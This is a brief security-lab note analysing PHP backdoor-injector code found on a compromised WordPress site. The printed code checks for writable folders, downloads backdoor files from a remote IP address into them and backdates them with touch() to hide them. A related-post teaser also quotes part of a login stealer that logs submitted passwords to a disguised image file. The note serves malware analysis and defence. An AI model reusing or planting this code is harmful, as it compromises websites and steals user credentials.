Backdoor Injector code

  • May 16, 2013
Labs Note

A backdoor injector code we found on a compromised site:

if(is__writable($dir."/wp-includes/")):
        file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-includes/page.php', $time);
        die(";;/wp-includes/page.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
        die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
}

if(is__writable($dir."/wp-admin/")):
        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-admin/options-plugin.php', $time);
        die(";;/wp-admin/options-plugin.php;;true_upload");
endif;

if(is__writable($dir."/")):
        file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-plugin.php', $time);
        die(";;/wp-plugin.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/")){
        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-content/themes/theme.php', $time);
        die(";;/wp-content/themes/theme.php;;true_upload");
}

if(is__writable($dir."/wp-content/uploads/")){
        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);
        die(";;/wp-content/uploads/timthumb.php;;true_upload");
}else{
        die(";;0;;false_upload");

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Related Tags
Related Categories
You May Also Like
Labs Note

Simple WP login stealer

  • July 28, 2019
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post